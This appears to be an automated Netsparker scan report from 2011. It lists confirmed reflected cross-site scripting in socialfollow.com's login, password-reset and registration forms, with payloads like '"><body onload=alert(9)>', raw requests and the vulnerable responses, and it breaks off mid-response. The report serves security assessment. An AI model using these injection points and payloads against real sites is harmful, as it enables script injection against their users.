class="profile"> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="pic"><span style="height:49px;"><img src="/images/profiles/a-and-s-fine-foods-wyckoff-7beab34bf598bd1b6442ddf2b99ee169.png" alt="A And S Fine Foods Wyckoff" width="80" /></span></a> <p class="name"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff" class="green">A And S Fine Foods Wyckoff</a></p> <p class="desc orange"> Every day we work hard to bring you the very best in Italian specialties, personally prepared foods with the freshest and finest ingredients, and [...]</p> <p class="fullProfile"><a href="/profiles/a-and-s-fine-foods-wyckoff/" title="A And S Fine Foods Wyckoff">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="pic"><span style="height:115px;"><img src="/images/profiles/a-child-by-mercy-58445fdc182a33719f133fca101c155d.jpg" alt="A Child By Mercy" width="80" /></span></a> <p class="name"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy" class="green">A Child By Mercy</a></p> <p class="desc orange"> Author, Speaker, Urban Missionary, and Musicain [...]</p> <p class="fullProfile"><a href="/profiles/a-child-by-mercy/" title="A Child By Mercy">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="pic"><span style="height:60px;"><img src="/images/profiles/a-comer-sabroso-863aa08898eef8778f827a5054a1bd7f.jpg" alt="A Comer Sabroso" width="80" /></span></a> <p class="name"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso" class="green">A Comer Sabroso</a></p> <p class="desc orange"> RECETAS DE COMIDAS, POSTRES Y LICORES [...]</p> <p class="fullProfile"><a href="/profiles/a-comer-sabroso/" title="A Comer Sabroso">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="pic"><span style="height:80px;"><img src="/images/profiles/mystery-man.jpg" alt="A Little Bite Of Life" width="80" /></span></a> <p class="name"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life" class="green">A Little Bite Of Life</a></p> <p class="desc orange"> Food, family, funny! [...]</p> <p class="fullProfile"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <p class="name"><a href="/profiles/a-special-touch/" title="A Special Touch" class="green">A Special Touch</a></p> <p class="desc orange"> Handmade Greeting cards for any occasion. [...]</p> <p class="fullProfile"><a href="/profiles/a-special-touch/" title="A Special Touch">View Full <span class="green"..
- /login.php

/login.php CONFIRMED

http://www.socialfollow.com/login.php

Parameters

Parameter Type Value
pPassword POST 3
submit POST submit
tEmail POST "><body onload=alert(9)>

Request

POST /login.php HTTP/1.1
Referer: http://www.socialfollow.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 72
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

pPassword=3&submit=submit&tEmail=%22%3e%3cbody+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:34 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4519
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Login | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Login </h1> <p style="color: red;">The "Email Address" field must contain a valid email.<br /></p> <form method="post" name="fLogin" action=""> <table> <tr> <td width="115" valign="top"><label for="tEmail">Email Address:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><body onload=netsparker(9)>" class="textBoxSize" /></td> </tr> <tr> <td valign="top"><label for="pPassword">Password:</label></td> <td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td>&nbsp;</td> <td><input name="submit" type="image" value="submit" src="/images/login-btn.gif" class="loginBtn" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fLogin");fv.addValidation("tEmail","req", "The \"Email Address\" field is required");fv.addValidation("tEmail","email", "The \"Email Address\" field must contain a valid email");fv.addValidation("pPassword","req", "The \"Password\" field is required");document.fLogin.tEmail.style.borderColor = '#FF0000';</script></div><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /forgot-password.php

/forgot-password.php CONFIRMED

http://www.socialfollow.com/forgot-password.php

Parameters

Parameter Type Value
tEmail POST "><iframe onload=alert(9)>

Request

POST /forgot-password.php HTTP/1.1
Referer: http://www.socialfollow.com/forgot-password.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 48
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

tEmail=%22%3e%3ciframe+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:39 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4495
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Forgot Your Password? | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Forgot Your <span class="orange">Password</span></h1> <p>If you have forgotten your password and would like to reset it, enter your email below:</p> <br /> <p style="color: red;">The "Email" field must contain a valid email address.<br /></p> <form method="post" name="fForgotPassword" action=""> <table> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="100" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input type="image" src="/images/btn_reset-password.gif" alt="Reset Password" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fForgotPassword");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");document.fForgotPassword.tEmail.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /login.php

/login.php CONFIRMED

http://www.socialfollow.com/login.php

Parameters

Parameter Type Value
pPassword POST Password
tEmail POST "><iframe onload=alert(9)>

Request

POST /login.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 67
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

pPassword=Password&tEmail=%22%3e%3ciframe+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4521
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Login | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Login </h1> <p style="color: red;">The "Email Address" field must contain a valid email.<br /></p> <form method="post" name="fLogin" action=""> <table> <tr> <td width="115" valign="top"><label for="tEmail">Email Address:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" /></td> </tr> <tr> <td valign="top"><label for="pPassword">Password:</label></td> <td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td>&nbsp;</td> <td><input name="submit" type="image" value="submit" src="/images/login-btn.gif" class="loginBtn" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fLogin");fv.addValidation("tEmail","req", "The \"Email Address\" field is required");fv.addValidation("tEmail","email", "The \"Email Address\" field must contain a valid email");fv.addValidation("pPassword","req", "The \"Password\" field is required");document.fLogin.tEmail.style.borderColor = '#FF0000';</script></div><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST "><body onload=alert(9)>
tName POST Smith
tPassword POST 3
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 122
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=%22%3e%3cbody+onload%3dnetsparker(9)%3e&tName=Smith&tPassword=3&tRePassword=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:44 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6220
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The "Email" field must contain a valid email address.<br />The "Password" field must have at least 4 characters.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[Current length = 1]<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="Smith" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><body onload=netsparker(9)>" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="3" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" src="/images/btn_sign-up.gif" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");document.fRegister.tEmail.style.borderColor = '#FF0000';document.fRegister.tPassword.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST netsparker@example.com
tName POST "><iframe onload=alert(9)>
tPassword POST 3
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Content-Length: 143
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=netsparker%40example.com&tName=%22%3e%3ciframe+onload%3dnetsparker(9)%3e&tPassword=3&tRePassword=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:48:37 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6123
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Register | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> <li><a href="/" title="Join Now!" class="button<?= $joinNow; ?>">Join Now!</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Sign <span class="orange">Up.</span> It's Free!</h1> <br /> <p style="color: red;">The "Password" field must have at least 4 characters.<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[Current length = 1]<br /></p> <form method="post" name="fRegister" action=""> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="netsparker@example.com" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="3" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" value="1" checked="checked" /> Subscribe to Social Follow's Newsletter</td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" value="agree" checked="checked" 